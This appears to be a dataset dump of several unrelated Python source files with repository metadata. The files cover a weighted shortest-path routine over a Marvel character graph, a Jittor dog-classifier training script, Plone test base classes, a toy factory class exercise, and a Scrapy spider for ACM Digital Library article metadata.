    """Single-source shortest paths from *v* over the co-appearance graph.

    Each edge costs 1 / weight, so strong co-appearances are "closer".
    Returns (hops, dist): hop count and weighted distance per reachable node.
    """
    frontier = [(0, v)]
    tentative = {v: 0}
    hops = {v: 0}
    settled = {}
    while tentative:
        weight, node = heapq.heappop(frontier)
        # Skip stale heap entries for already-settled or improved nodes.
        if node in settled or (node in tentative and weight > tentative[node]):
            continue
        del tentative[node]
        settled[node] = weight
        for neighbor, strength in HG[node].items():
            if neighbor in settled:
                continue
            candidate = weight + 1.00 / strength
            if neighbor not in tentative or candidate < tentative[neighbor]:
                tentative[neighbor] = candidate
                hops[neighbor] = hops[node] + 1
                heapq.heappush(frontier, (candidate, neighbor))
    return hops, settled
def sub_test():
    # Smoke-test the pipeline on a small hand-built 4-character fixture.
    (marvelG, characters) = ({
        'A': {'AB_book', 'AC_book', 'ABCD_book', 'AB_book2'},
        'AB_book': {'A', 'B'},
        'AB_book2': {'A', 'B'},
        'B': {'AB_book', 'BD_book', 'ABCD_book', 'AB_book2'},
        'BD_book': {'B', 'D'},
        'D': {'BD_book', 'CD_book', 'ABCD_book'},
        'CD_book': {'C', 'D'},
        'C': {'CD_book', 'AC_book', 'ABCD_book'},
        'AC_book': {'A', 'C'},
        'ABCD_book': {'A', 'B', 'C', 'D'}
    }, {'A': 1, 'B': 1, 'C': 1, 'D': 1})
    HG = make_hop_graph(marvelG, characters)
    (WG, w_routes) = make_weight_graph(HG, characters)
    print HG
    print WG
    print w_routes
    count = 0
    # Count character pairs whose best weighted route needs more than one hop.
    for ch1 in w_routes:
        for ch2 in w_routes[ch1]:
            if ch1 != ch2 and 1 != w_routes[ch1][ch2]:
                count += 1
    print count
def test():
    # Full run over the marvel_graph data file on disk.
    (marvelG, characters) = read_graph('marvel_graph')
    HG = make_hop_graph(marvelG, characters)
    (WG, w_routes) = make_weight_graph(HG, characters)
    count = 0
    # Count character pairs whose best weighted route needs more than one hop.
    for ch1 in w_routes:
        for ch2 in w_routes[ch1]:
            if ch1 != ch2 and 1 != w_routes[ch1][ch2]:
                count += 1
    print count
# Run the small fixture check first, then the full marvel_graph dataset.
sub_test()
test()
| [
"="
] | = |
03c7db3d432555998947878d40132af841780c83 | 57ef48cbc61bc3bf890088ec24a50c440bc36072 | /dogflb/train-tiny.py | 5abdd5e1943352ec94cd42ee7dac641ef5b1603d | [] | no_license | ShenDezhou/CAIL2021 | 8be1ea07dd47085126b9092998de72dc0c70973d | aab19b42e9ea1ba29158df577087e827419adae8 | refs/heads/master | 2023-03-28T11:17:09.541712 | 2021-03-29T14:11:40 | 2021-03-29T14:11:40 | 328,170,130 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,373 | py | import os
import jittor as jt
import jittor.nn as nn
from dataset import TsinghuaDog
from jittor import transform
from jittor.optim import Adam, SGD
from tqdm import tqdm
import numpy as np
from model import Net
import argparse
jt.flags.use_cuda=1
def get_path(path):
    """Ensure the parent directory of *path* exists, then return *path*.

    Args:
        path: file path whose parent directory should exist.

    Returns:
        The unchanged *path*, now safe to write to.
    """
    parent = os.path.dirname(path)
    # A bare filename has no parent ('' would crash os.makedirs); skip it.
    # exist_ok avoids the check-then-create race of the previous version.
    if parent:
        os.makedirs(parent, exist_ok=True)
    return path
def train(model, train_loader, optimizer, epoch):
    """Run one training epoch, showing loss/accuracy in a tqdm progress bar.

    NOTE(review): total_acc, total_num and losses are accumulated but never
    read after the loop -- only per-batch values are displayed.
    """
    model.train()
    total_acc = 0
    total_num = 0
    losses = 0.0
    pbar = tqdm(train_loader, desc=f'Epoch {epoch} [TRAIN]')
    for images, labels in pbar:
        output = model(images)
        loss = nn.cross_entropy_loss(output, labels)
        optimizer.step(loss)
        # Per-batch accuracy, in percent.
        pred = np.argmax(output.data, axis=1)
        acc = np.mean(pred == labels.data) * 100
        total_acc += acc
        total_num += labels.shape[0]
        losses += loss
        pbar.set_description(f'Epoch {epoch} [TRAIN] loss = {loss.data[0]:.2f}, acc = {acc:.2f}')
# Best validation accuracy seen so far (shared across evaluate() calls).
best_acc = -1.0
def evaluate(model, val_loader, epoch=0, save_path='./best_model.bin'):
    """Evaluate on the validation set; save the model when accuracy improves.

    Updates the module-level best_acc and writes the model to save_path
    (creating parent directories via get_path) on a new best score.
    """
    model.eval()
    global best_acc
    total_acc = 0
    total_num = 0
    pbar = tqdm(val_loader, desc=f'Epoch {epoch} [EVAL]')
    for images, labels in pbar:
        output = model(images)
        pred = np.argmax(output.data, axis=1)
        # Running accuracy as a fraction of samples seen so far.
        acc = np.sum(pred == labels.data)
        total_acc += acc
        total_num += labels.shape[0]
        pbar.set_description(f'Epoch {epoch} [EVAL] acc = {total_acc / total_num :.2f}')
    acc = total_acc / total_num
    if acc > best_acc:
        best_acc = acc
        get_path(save_path)
        model.save(save_path)
    print ('Test in epoch', epoch, 'Accuracy is', acc, 'Best accuracy is', best_acc)
#python train-tiny.py --epochs 5 --batch_size 32 --dataroot /mnt/data/dogfldocker --model_path model/res50/model.bin --resume False
def main():
    """Parse CLI arguments and run training (or evaluation-only) for the
    Tsinghua Dog classifier."""
    parser = argparse.ArgumentParser()
    parser.add_argument('--batch_size', type=int, default=32)
    parser.add_argument('--epochs', type=int, default=50)
    parser.add_argument('--num_classes', type=int, default=130)
    parser.add_argument('--lr', type=float, default=2e-3)
    parser.add_argument('--weight_decay', type=float, default=1e-5)
    # NOTE(review): type=bool on argparse treats any non-empty string
    # (including "False") as True -- confirm callers rely on presence only.
    parser.add_argument('--resume', type=bool, default=False)
    parser.add_argument('--eval', type=bool, default=False)
    parser.add_argument('--dataroot', type=str, default='/content/drive/MyDrive/dogflg/data2/')
    parser.add_argument('--model_path', type=str, default='./best_model.bin')
    parser.add_argument('--sampleratio', type=float, default=0.8)
    args = parser.parse_args()
    # Training transforms: resize, center-crop, random flip, normalize.
    transform_train = transform.Compose([
        transform.Resize((256, 256)),
        transform.CenterCrop(224),
        transform.RandomHorizontalFlip(),
        transform.ToTensor(),
        transform.ImageNormalize(0.485, 0.229),
        # transform.ImageNormalize(0.485, 0.456, 0.406], [0.229, 0.224, 0.225]),
    ])
    root_dir = args.dataroot
    train_loader = TsinghuaDog(root_dir, batch_size=args.batch_size, train=True, part='train', shuffle=True, transform=transform_train, sample_rate=args.sampleratio)
    # Validation transforms: deterministic (no random flip).
    transform_test = transform.Compose([
        transform.Resize((256, 256)),
        transform.CenterCrop(224),
        transform.ToTensor(),
        transform.ImageNormalize(0.485, 0.229),
        # transform.ImageNormalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225]),
    ])
    val_loader = TsinghuaDog(root_dir, batch_size=args.batch_size, train=False, part='val', shuffle=False, transform=transform_test, sample_rate=args.sampleratio)
    epochs = args.epochs
    model = Net(num_classes=args.num_classes)
    lr = args.lr
    # NOTE(review): weight_decay is parsed but not passed to the optimizer.
    weight_decay = args.weight_decay
    optimizer = SGD(model.parameters(), lr=lr, momentum=0.99)
    if args.resume:
        model.load(args.model_path)
        print('model loaded', args.model_path)
    #random save for test
    #model.save(args.model_path)
    if args.eval:
        # Evaluation-only mode: score the checkpoint and exit.
        evaluate(model, val_loader, save_path=args.model_path)
        return
    for epoch in range(epochs):
        train(model, train_loader, optimizer, epoch)
        evaluate(model, val_loader, epoch, save_path=args.model_path)
main()
| [
"bangtech@sina.com"
] | bangtech@sina.com |
9ef838759387609b5be7812eeda6c96df2a63f72 | 1cb8f578fab815e7031b9302b809d2fce1bad56f | /plone/app/s5slideshow/tests/base.py | 25e2d02fbf315c5cee64b5438058531f37813840 | [] | no_license | toutpt/plone.app.s5slideshow | 103856fdefc6504193e9d5b981fa377c7c5ace1a | ee2129c3e40cc03fadad2490730100ad715f5395 | refs/heads/master | 2020-06-04T15:18:27.754687 | 2012-02-28T07:52:39 | 2012-02-28T07:52:39 | 3,160,939 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,002 | py | import unittest2 as unittest
from zope import interface
from plone.app import testing
from plone.app.s5slideshow.tests import layer
class UnitTestCase(unittest.TestCase):
    """Base class for plain unit tests that need no Plone test layer."""

    def setUp(self):
        super(UnitTestCase, self).setUp()
class TestCase(unittest.TestCase):
    """Integration-test base: Plone portal plus a fake ZPublisher request."""

    layer = layer.INTEGRATION

    def setUp(self):
        # Imported lazily so the module can load without a full Zope setup.
        from ZPublisher.tests.testPublish import Request
        super(TestCase, self).setUp()
        self.portal = self.layer['portal']
        self.request = Request()
class FunctionalTestCase(unittest.TestCase):
    """Functional-test base running against the FUNCTIONAL Plone layer."""

    layer = layer.FUNCTIONAL

    def setUp(self):
        super(FunctionalTestCase, self).setUp()
        self.portal = self.layer['portal']
        # NOTE(review): the second setRoles call replaces the first, so the
        # test user ends up with only the Member role -- confirm intended.
        testing.setRoles(self.portal, testing.TEST_USER_ID, ['Manager'])
        testing.setRoles(self.portal, testing.TEST_USER_ID, ['Member'])
def build_test_suite(test_classes):
    """Bundle each TestCase class in *test_classes* into one TestSuite."""
    combined = unittest.TestSuite()
    for case_class in test_classes:
        combined.addTest(unittest.makeSuite(case_class))
    return combined
| [
"toutpt@gmail.com"
] | toutpt@gmail.com |
18821b556650d403c0a02ae62e4c2f09bc774a23 | 51fb5fe41a2c5030fb9e46a029f80e8b637714f3 | /factory_app/factory.py | be6e96c991075f0550c8462cc83bba811227800a | [] | no_license | aliensmart/week2_day3 | 6c7512c77c09424c87cdd64fe634b23ae54ffa21 | 21125022850c398aa0b68295f2e40ca18c573f13 | refs/heads/master | 2020-07-13T05:31:44.581603 | 2019-08-29T19:25:27 | 2019-08-29T19:25:27 | 205,004,610 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,503 | py | #!/usr/bin/env python3
#Class
# Worker
# Item
# Factory
class Worker:
    """An employee on the factory floor.

    Attributes:
        name: the worker's name.
        job: the worker's job title.
        years: years of tenure at the factory.
        department: the department assigned for the day (None until set).
    """

    def __init__(self, name, job, years):
        self.name = name
        self.job = job
        self.years = years
        self.department = None

    def set_department(self, depart):
        """Re-assign this worker's department for the day to *depart*."""
        self.department = depart

    def increase_tenure(self):
        """Add one year to this worker's time at the factory."""
        self.years = self.years + 1
class Item:
    """A product manufactured by the factory.

    Attributes:
        name: the item's name.
        explosive: whether the item can explode.
        weight: the item's weight.
        cost: the item's price.
    """

    def __init__(self, name, explosive, weight, cost):
        self.name = name
        self.explosive = explosive
        self.weight = weight
        self.cost = cost

    def explode(self):
        """Return "Boom" when this item is explosive, otherwise None."""
        return "Boom" if self.explosive == True else None
battery = Item("battery", True, "4lbs", 200.99)
class Factory:
    """A factory with a roster of workers and a batch of products.

    Attributes:
        workers: list of Worker objects on staff.
        products: list of Item objects awaiting shipment.
        days_since_last_incident: safety counter, reset by incident().
    """

    def __init__(self, workers=None, products=None):
        # None sentinels instead of mutable defaults: the previous
        # `workers=[]` / `products=[]` defaults were shared between every
        # Factory instance created without arguments.
        self.workers = workers if workers is not None else []
        self.products = products if products is not None else []
        self.days_since_last_incident = 0

    def add_worker(self, worker):
        """Add a Worker object to this factory's roster."""
        self.workers.append(worker)

    def create_product(self, item):
        """Add an Item object to the batch of finished products."""
        self.products.append(item)

    def ship(self):
        """Ship everything currently produced, emptying the product list."""
        self.products = []

    def add_day(self):
        """Record one more day without an incident."""
        self.days_since_last_incident += 1

    def incident(self):
        """Record an incident, resetting the safety counter to zero."""
        self.days_since_last_incident = 0
| [
"kaoua17@gmail.com"
] | kaoua17@gmail.com |
34eb6021b51846ce284b8d310da82c2d4e56b2e5 | e905abd9bb7bd7017657d0a0c4d724d16e37044c | /.history/article/spiders/acm_20201230145258.py | 2bfa13a12a05f543b22b93f69e8ea2d0698e1dd7 | [] | no_license | tabdelbari/articles | a8b921841f84fb473f5ed1cdcda743863e6bc246 | f0e1dfdc9e818e43095933139b6379a232647898 | refs/heads/main | 2023-03-05T10:21:35.565767 | 2021-02-10T13:35:14 | 2021-02-10T13:35:14 | 325,654,973 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,360 | py | import scrapy
import logging
import re
from scrapy_splash import SplashRequest
from article.items import ArticleItem
class AcmSpider(scrapy.Spider):
    """Crawl ACM Digital Library search results via Splash-rendered pages.

    Starts from a keyword search, follows result pages, and yields one
    ArticleItem per article detail page.
    """
    name = 'acm'
    allowed_domains = ['acm.org']

    def __init__(self, topic='', keywords='', **kwargs):
        super().__init__(**kwargs)
        self.start_urls = ['https://dl.acm.org/action/doSearch?AllField=%s' %keywords]
        self.topic = topic

    def start_requests(self):
        # Splash rendering with a 10s wait for JS-driven result lists.
        for url in self.start_urls:
            yield SplashRequest(url, callback=self.find_articles, args={ 'wait': 10 })

    def find_articles(self, response):
        """Yield one request per article on a results page, plus next page."""
        # logging.info(response.text)
        articles_urls = response.xpath('.//*/div[contains(@class,"issue-item")]/*/h5/span/a/@href').getall()
        logging.info(f'{len(articles_urls)} articles found')
        for url in articles_urls:
            article_url = 'https://dl.acm.org' + url
            yield SplashRequest(article_url, callback=self.parse, args={ 'wait': 10 })
        next_page = response.xpath('.//*/nav[contains(@class, "pagination")]/span/a[@title="Next Page"]/@href').get(default='')
        logging.info('Next page found:')
        if next_page != '':
            yield SplashRequest(next_page, callback=self.find_articles, args={ 'wait': 10 })

    def parse(self, response):
        """Extract an ArticleItem from one article detail page."""
        logging.info('Processing --> ' + response.url)
        article = ArticleItem()
        # NOTE(review): this dict is built but never used below -- likely
        # a leftover from an earlier version; confirm before removing.
        result = {
            'title' : '',
            'authors': '',
            'country': '',
            'abstract': '',
            'date_pub': '',
            'journal': '',
        }
        article['title'] = response.xpath('//*/article/*/div[@class="citation"]/div/h1[@class="citation__title"]').get(default='')
        authors = response.xpath('//*/div[@class="citation"]/div/div/ul/li/a/@title').getall()
        article['authors'] = '|'.join(authors)
        article['country'] = ''
        article['abstract'] = response.xpath('//*/div[contains(@class,"abstractSection")]/p').get(default='')
        article['date_pub'] = response.xpath('//*/span[@class="epub-section__date"]').get(default='')
        article['journal'] = response.xpath('//*/span[@class="epub-section__title"]').get(default='')
        article['topic'] = self.topic
        article['latitude'] = ''
        article['longitude'] = ''
        yield article
| [
"abdelbari1996@hotmail.com"
] | abdelbari1996@hotmail.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.